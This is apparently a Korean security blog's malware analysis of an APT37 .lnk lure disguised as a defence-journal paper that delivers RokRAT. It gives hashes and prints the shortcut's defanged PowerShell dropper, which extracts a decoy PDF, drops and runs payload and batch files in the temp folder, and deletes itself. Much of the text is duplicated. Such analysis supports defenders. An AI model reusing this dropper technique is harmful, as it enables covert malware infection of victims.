북한 해킹 단체 APT37(Reaper)에서 만든 악성코드-한국군사학논총(2025.3.26)
Contents
오늘은 북한 해킹 단체 APT37(Reaper)에서 만든 악성코드 인 한국군사학논총(2025.3.26)에 대해 글을 적어보겠습니다.
일단 현재 기고 중인 국방 분야 학술논문으로 위장하여 RokRAT 악성코드를 유포를 하는 방식으로 공격을 하고 있습니다.
악성코드는 기본적으로 PowerShell를 악용을 하고 있는 것이 특징입니다.
파일명:한국군사학논총. lnk
사이즈:50 MB
MD5:2f431c4e65af9908d2182c6a093bf262
SHA-1:d4f15c892cc8c56fba4756526871b2b5f9def840
SHA-256:d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261
악성코드 내용
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('d)ir C:\Windows\SysWow64\WindowsPower
Shell\v1.0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Ma
tch 'S(y)stem32' -or $di(r)Path -Match 'Pro(g)ram Files') {$dirPath = '%t(e)mp%'};$exs=@('(.)ln
k');($)lnkPath = Get-Ch(i)ldItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in
$exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$l
nkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.File
(A)ccess]::Read);$lnkFile.Seek(0x(0)00010E4, [System.IO(.)SeekOrigin]::Begin);$pdf(F)ile=Ne
w-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.repla
ce('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A(8)A49
,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0(x)000D9190;$lnkFile.Read($exeF
ile, 0, 0x000D9190);$exePath=$env:temp(+)'\toy01(.)dat';sc $exePath $exeFile -Encoding Byte
;$lnkFile(.)Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[]
0x00000634(;$)lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02(
.)dat';$string = [Text(.)Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | O
ut-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigi
n]::Begin);$ba(t)Byte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C)
;$executePath = $env:temp+'\'+'toy0'(+)'3.b'(+)'a'+'t'; Write-Host $executePath; Write-Host
$ba(t)StrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString |
Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System(.)
IO.File]::Delete($lnkPath);"&& …
일단 현재 기고 중인 국방 분야 학술논문으로 위장하여 RokRAT 악성코드를 유포를 하는 방식으로 공격을 하고 있습니다.
악성코드는 기본적으로 PowerShell를 악용을 하고 있는 것이 특징입니다.
파일명:한국군사학논총. lnk
사이즈:50 MB
MD5:2f431c4e65af9908d2182c6a093bf262
SHA-1:d4f15c892cc8c56fba4756526871b2b5f9def840
SHA-256:d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261
악성코드 내용
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('d)ir C:\Windows\SysWow64\WindowsPower
Shell\v1.0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Ma
tch 'S(y)stem32' -or $di(r)Path -Match 'Pro(g)ram Files') {$dirPath = '%t(e)mp%'};$exs=@('(.)ln
k');($)lnkPath = Get-Ch(i)ldItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in
$exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$l
nkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.File
(A)ccess]::Read);$lnkFile.Seek(0x(0)00010E4, [System.IO(.)SeekOrigin]::Begin);$pdf(F)ile=Ne
w-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.repla
ce('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A(8)A49
,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0(x)000D9190;$lnkFile.Read($exeF
ile, 0, 0x000D9190);$exePath=$env:temp(+)'\toy01(.)dat';sc $exePath $exeFile -Encoding Byte
;$lnkFile(.)Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[]
0x00000634(;$)lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02(
.)dat';$string = [Text(.)Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | O
ut-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigi
n]::Begin);$ba(t)Byte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C)
;$executePath = $env:temp+'\'+'toy0'(+)'3.b'(+)'a'+'t'; Write-Host $executePath; Write-Host
$ba(t)StrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString |
Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System(.)
IO.File]::Delete($lnkPath);"&& …
IoC
d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261
d4f15c892cc8c56fba4756526871b2b5f9def840
2f431c4e65af9908d2182c6a093bf262
d4f15c892cc8c56fba4756526871b2b5f9def840
2f431c4e65af9908d2182c6a093bf262